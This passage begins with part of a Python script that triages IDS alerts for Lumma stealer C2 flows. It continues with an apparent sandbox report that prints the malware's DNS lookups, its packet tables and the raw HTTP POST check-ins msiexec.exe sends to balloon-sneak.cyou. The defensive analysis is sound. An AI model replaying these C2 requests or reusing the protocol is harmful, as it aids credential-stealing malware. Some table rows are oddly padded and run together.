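    """'confirmed' if any ET MALWARE rule fired, 'ja3-only' if only the fingerprint did."""
    if any(sig.startswith(MALWARE_PREFIX) for _ts, _sid, sig, _sev in hits):
        return "confirmed"
    if all(sid == JA3_HINT_SID for _ts, sid, _sig, _sev in hits):
        return "ja3-only"
    return "other"


def triage(rows):
    """Per-flow verdicts plus the destination IPs seen only in confirmed flows."""
    flows = group_by_flow(rows)
    verdicts = {flow: flow_verdict(hits) for flow, hits in flows.items()}
    c2_ips = sorted({f.dst_ip for f, v in verdicts.items() if v == "confirmed"})
    return verdicts, c2_ips


if __name__ == "__main__":
    verdicts, c2_ips = triage(ALERT_ROWS)
    for flow, verdict in verdicts.items():
        print(f"{flow.src_ip}:{flow.src_port} -> {flow.dst_ip}:{flow.dst_port}  {verdict}")
    print("block candidates:", c2_ips)
```

Run as-is it prints three flows: the two to 172.67.170.85 are "confirmed" (JA3 hit followed by a Lumma C2 or exfiltration rule on the same socket), the one to 104.26.2.16 is "ja3-only" and is deliberately kept out of the block list, since a JA3 match alone collides with legitimate clients too often to act on by itself.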
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Nov 29, 2024 15:45:49.845685005 CET  49736        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:49.845716953 CET  443          49736      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:49.845783949 CET  49736        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:49.850085974 CET  49736        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:49.850097895 CET  443          49736      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:51.132767916 CET  443          49736      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:51.132831097 CET  49736        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:51.150580883 CET  49736        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:51.150589943 CET  443          49736      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:51.150795937 CET  443          49736      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:51.223474026 CET  49736        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:51.223500967 CET  49736        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:51.223536968 CET  443          49736      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:54.094913960 CET  443          49736      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:54.094980001 CET  443          49736      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:54.095025063 CET  49736        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:54.096432924 CET  49736        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:54.096437931 CET  443          49736      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:54.096468925 CET  49736        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:54.096472979 CET  443          49736      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:54.184326887 CET  49737        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:54.184370995 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:54.184431076 CET  49737        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:54.185370922 CET  49737        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:54.185388088 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:55.504762888 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:55.504839897 CET  49737        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:55.506093025 CET  49737        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:55.506103992 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:55.506323099 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:55.507678032 CET  49737        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:55.507694006 CET  49737        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:55.507738113 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:58.553709030 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:58.553767920 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:58.553817987 CET  49737        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:58.553833961 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:58.553929090 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:58.553957939 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:58.553967953 CET  49737        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:58.553977013 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:58.554013968 CET  49737        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:58.562212944 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:58.570689917 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:58.570760012 CET  49737        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:58.570775986 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:58.629750967 CET  49737        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:58.673753977 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:58.677970886 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:58.678020954 CET  49737        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:58.678035021 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:58.719181061 CET  49737        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:58.745630980 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:58.749671936 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:58.749722958 CET  49737        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:58.749749899 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:58.749763966 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:58.749808073 CET  49737        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:58.749908924 CET  49737        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:58.749926090 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:58.749936104 CET  49737        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:58.749941111 CET  443          49737      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:58.881949902 CET  49739        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:58.881984949 CET  443          49739      172.67.170.85  192.168.2.4
Nov 29, 2024 15:45:58.882059097 CET  49739        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:58.882344961 CET  49739        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:45:58.882359982 CET  443          49739      172.67.170.85  192.168.2.4
Nov 29, 2024 15:46:00.311971903 CET  443          49739      172.67.170.85  192.168.2.4
Nov 29, 2024 15:46:00.312055111 CET  49739        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:46:00.313419104 CET  49739        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:46:00.313426971 CET  443          49739      172.67.170.85  192.168.2.4
Nov 29, 2024 15:46:00.313646078 CET  443          49739      172.67.170.85  192.168.2.4
Nov 29, 2024 15:46:00.314702034 CET  49739        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:46:00.314800978 CET  49739        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:46:00.314832926 CET  443          49739      172.67.170.85  192.168.2.4
Nov 29, 2024 15:46:00.314887047 CET  49739        443        192.168.2.4    172.67.170.85
Nov 29, 2024 15:46:00.314893961 CET  443          49739      172.67.170.85  192.168.2.4
Nov 29, 2024 15:46:02.844702959 CET  443          49739      172.67.170.85  192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:02.844789982 CET44349739172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:02.844847918 CET49739443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:02.844988108 CET49739443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:02.845005035 CET44349739172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:02.945164919 CET49747443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:02.945179939 CET44349747172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:02.945249081 CET49747443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:02.945476055 CET49747443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:02.945485115 CET44349747172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:04.505424023 CET44349747172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:04.505532026 CET49747443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:04.506644964 CET49747443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:04.506650925 CET44349747172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:04.506845951 CET44349747172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:04.507914066 CET49747443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:04.508008003 CET49747443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:04.508033037 CET44349747172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:07.083241940 CET44349747172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:07.083353043 CET44349747172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:07.083425999 CET49747443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:07.086028099 CET49747443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:07.086045027 CET44349747172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:07.667819977 CET49758443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:07.667855024 CET44349758172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:07.667916059 CET49758443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:07.668288946 CET49758443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:07.668301105 CET44349758172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:09.082359076 CET44349758172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:09.082468987 CET49758443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:09.083713055 CET49758443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:09.083729982 CET44349758172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:09.083962917 CET44349758172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:09.087610960 CET49758443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:09.087759972 CET49758443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:09.087801933 CET44349758172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:09.087884903 CET49758443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:09.087893963 CET44349758172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:12.178565979 CET44349758172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:12.178646088 CET44349758172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:12.178698063 CET49758443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:12.178783894 CET49758443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:12.178800106 CET44349758172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:12.621741056 CET49771443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:12.621776104 CET44349771172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:12.621869087 CET49771443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:12.622260094 CET49771443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:12.622271061 CET44349771172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:13.868978977 CET44349771172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:13.869082928 CET49771443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:13.870408058 CET49771443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:13.870414972 CET44349771172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:13.870655060 CET44349771172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:13.871844053 CET49771443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:13.871947050 CET49771443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:13.871952057 CET44349771172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:16.481388092 CET44349771172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:16.481467009 CET44349771172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:16.481544018 CET49771443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:16.498107910 CET49771443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:16.498116970 CET44349771172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:17.292787075 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:17.292804003 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:17.292865992 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:17.293242931 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:17.293252945 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.572103024 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.572182894 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.578080893 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.578088045 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.578288078 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.579644918 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.580816984 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.580848932 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.580959082 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.580981016 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.584676027 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.584712982 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.588768959 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.588788986 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.589505911 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.589534998 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.589694023 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.589728117 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.589737892 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.589741945 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.589865923 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.589886904 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.589932919 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.591120005 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.591149092 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.635332108 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.635463953 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.635493994 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:23.170373917 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:23.170460939 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:23.170567989 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:23.170738935 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:23.170754910 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:23.255342960 CET49795443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:23.255378008 CET44349795172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:23.255444050 CET49795443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:23.255834103 CET49795443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:23.255847931 CET44349795172.67.170.85192.168.2.4
Nov 29, 2024 15:46:24.527304888 CET | 443 | 49795 | 172.67.170.85 | 192.168.2.4
Nov 29, 2024 15:46:24.527434111 CET | 49795 | 443 | 192.168.2.4 | 172.67.170.85
Nov 29, 2024 15:46:24.528688908 CET | 49795 | 443 | 192.168.2.4 | 172.67.170.85
Nov 29, 2024 15:46:24.528703928 CET | 443 | 49795 | 172.67.170.85 | 192.168.2.4
Nov 29, 2024 15:46:24.528955936 CET | 443 | 49795 | 172.67.170.85 | 192.168.2.4
Nov 29, 2024 15:46:24.530567884 CET | 49795 | 443 | 192.168.2.4 | 172.67.170.85
Nov 29, 2024 15:46:24.530586958 CET | 49795 | 443 | 192.168.2.4 | 172.67.170.85
Nov 29, 2024 15:46:24.530636072 CET | 443 | 49795 | 172.67.170.85 | 192.168.2.4
Nov 29, 2024 15:46:27.314353943 CET | 443 | 49795 | 172.67.170.85 | 192.168.2.4
Nov 29, 2024 15:46:27.314428091 CET | 443 | 49795 | 172.67.170.85 | 192.168.2.4
Nov 29, 2024 15:46:27.314479113 CET | 49795 | 443 | 192.168.2.4 | 172.67.170.85
Nov 29, 2024 15:46:27.367408991 CET | 49795 | 443 | 192.168.2.4 | 172.67.170.85
Nov 29, 2024 15:46:27.367425919 CET | 443 | 49795 | 172.67.170.85 | 192.168.2.4
Nov 29, 2024 15:46:27.367438078 CET | 49795 | 443 | 192.168.2.4 | 172.67.170.85
Nov 29, 2024 15:46:27.367444038 CET | 443 | 49795 | 172.67.170.85 | 192.168.2.4
Nov 29, 2024 15:46:27.709969997 CET | 49806 | 443 | 192.168.2.4 | 104.26.2.16
Nov 29, 2024 15:46:27.710021019 CET | 443 | 49806 | 104.26.2.16 | 192.168.2.4
Nov 29, 2024 15:46:27.710100889 CET | 49806 | 443 | 192.168.2.4 | 104.26.2.16
Nov 29, 2024 15:46:27.710479975 CET | 49806 | 443 | 192.168.2.4 | 104.26.2.16
Nov 29, 2024 15:46:27.710514069 CET | 443 | 49806 | 104.26.2.16 | 192.168.2.4
Nov 29, 2024 15:46:29.110686064 CET | 443 | 49806 | 104.26.2.16 | 192.168.2.4
Nov 29, 2024 15:46:29.110775948 CET | 49806 | 443 | 192.168.2.4 | 104.26.2.16
Nov 29, 2024 15:46:29.112288952 CET | 49806 | 443 | 192.168.2.4 | 104.26.2.16
Nov 29, 2024 15:46:29.112298012 CET | 443 | 49806 | 104.26.2.16 | 192.168.2.4
Nov 29, 2024 15:46:29.112531900 CET | 443 | 49806 | 104.26.2.16 | 192.168.2.4
Nov 29, 2024 15:46:29.113749981 CET | 49806 | 443 | 192.168.2.4 | 104.26.2.16
Nov 29, 2024 15:46:29.159332991 CET | 443 | 49806 | 104.26.2.16 | 192.168.2.4
Nov 29, 2024 15:46:29.683913946 CET | 443 | 49806 | 104.26.2.16 | 192.168.2.4
Nov 29, 2024 15:46:29.684000015 CET | 443 | 49806 | 104.26.2.16 | 192.168.2.4
Nov 29, 2024 15:46:29.684048891 CET | 443 | 49806 | 104.26.2.16 | 192.168.2.4
Nov 29, 2024 15:46:29.684046984 CET | 49806 | 443 | 192.168.2.4 | 104.26.2.16
Nov 29, 2024 15:46:29.684073925 CET | 443 | 49806 | 104.26.2.16 | 192.168.2.4
Nov 29, 2024 15:46:29.684109926 CET | 49806 | 443 | 192.168.2.4 | 104.26.2.16
Nov 29, 2024 15:46:29.684118032 CET | 443 | 49806 | 104.26.2.16 | 192.168.2.4
Nov 29, 2024 15:46:29.684154987 CET | 443 | 49806 | 104.26.2.16 | 192.168.2.4
Nov 29, 2024 15:46:29.684194088 CET | 443 | 49806 | 104.26.2.16 | 192.168.2.4
Nov 29, 2024 15:46:29.684196949 CET | 49806 | 443 | 192.168.2.4 | 104.26.2.16
Nov 29, 2024 15:46:29.684207916 CET | 443 | 49806 | 104.26.2.16 | 192.168.2.4
Nov 29, 2024 15:46:29.684252024 CET | 49806 | 443 | 192.168.2.4 | 104.26.2.16
Nov 29, 2024 15:46:29.684259892 CET | 443 | 49806 | 104.26.2.16 | 192.168.2.4
Nov 29, 2024 15:46:29.684314013 CET | 443 | 49806 | 104.26.2.16 | 192.168.2.4
Nov 29, 2024 15:46:29.684360027 CET | 49806 | 443 | 192.168.2.4 | 104.26.2.16
Nov 29, 2024 15:46:29.684648991 CET | 49806 | 443 | 192.168.2.4 | 104.26.2.16
Nov 29, 2024 15:46:29.684662104 CET | 443 | 49806 | 104.26.2.16 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 29, 2024 15:45:49.332392931 CET | 59698 | 53 | 192.168.2.4 | 1.1.1.1
Nov 29, 2024 15:45:49.835932970 CET | 53 | 59698 | 1.1.1.1 | 192.168.2.4
Nov 29, 2024 15:46:27.389969110 CET | 64232 | 53 | 192.168.2.4 | 1.1.1.1
Nov 29, 2024 15:46:27.709086895 CET | 53 | 64232 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 29, 2024 15:45:49.332392931 CET | 192.168.2.4 | 1.1.1.1 | 0x73c1 | Standard query (0) | balloon-sneak.cyou | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:46:27.389969110 CET | 192.168.2.4 | 1.1.1.1 | 0xd500 | Standard query (0) | rentry.co | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 29, 2024 15:45:49.835932970 CET | 1.1.1.1 | 192.168.2.4 | 0x73c1 | No error (0) | balloon-sneak.cyou |  | 172.67.170.85 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:45:49.835932970 CET | 1.1.1.1 | 192.168.2.4 | 0x73c1 | No error (0) | balloon-sneak.cyou |  | 104.21.55.29 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:46:27.709086895 CET | 1.1.1.1 | 192.168.2.4 | 0xd500 | No error (0) | rentry.co |  | 104.26.2.16 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:46:27.709086895 CET | 1.1.1.1 | 192.168.2.4 | 0xd500 | No error (0) | rentry.co |  | 172.67.75.40 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:46:27.709086895 CET | 1.1.1.1 | 192.168.2.4 | 0xd500 | No error (0) | rentry.co |  | 104.26.3.16 | A (IP address) | IN (0x0001) | false
• balloon-sneak.cyou
• rentry.co
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 172.67.170.85 | 443 | 5544 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 14:45:51 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: balloon-sneak.cyou
2024-11-29 14:45:51 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-11-29 14:45:54 UTC | 1016 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 14:45:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=1mo8vv0uuj7p82i02pdde67b6j; expires=Tue, 25-Mar-2025 08:32:30 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=alfmOCkO9Lov5150ekWXUBzGwDlPPDH8up82tnNE18%2B3kXYauGyoF5uBqSjiFIR4hStvWbR40Kj2onPXMVlF8jaJ2mSvmHMnN4xkNfbAX3yYu4qZBr%2B%2BhKGhd7R9QwJ89fwxQ90%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ea362445d4d433e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1568&rtt_var=608&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1771844&cwnd=248&unsent_bytes=0&cid=fcd6d2c071b06a2d&ts=2973&x=0"
2024-11-29 14:45:54 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-11-29 14:45:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 172.67.170.85 | 443 | 5544 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 14:45:55 UTC | 266 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 49
Host: balloon-sneak.cyou
2024-11-29 14:45:55 UTC | 49 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 37 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=MeHdy4--pl8vs07&j=
2024-11-29 14:45:58 UTC | 1023 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 14:45:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=3jrvn29qaj020u52jr30h5khhs; expires=Tue, 25-Mar-2025 08:32:34 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BZkmwjSylZK6WNdiVg4f5A4qFW%2F37nFCO0MO316n8VEdptAsp2942MseiVkesfXsXfd%2Fp%2FjtAx9m1CArASyvrMX8Dy63%2FbndwVPlsD2YquRvisEX8H99BSOwbiSCavxwaEZeiik%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ea3625faf738cb9-EWR
alt-svc: h3=":443"; ma=86400
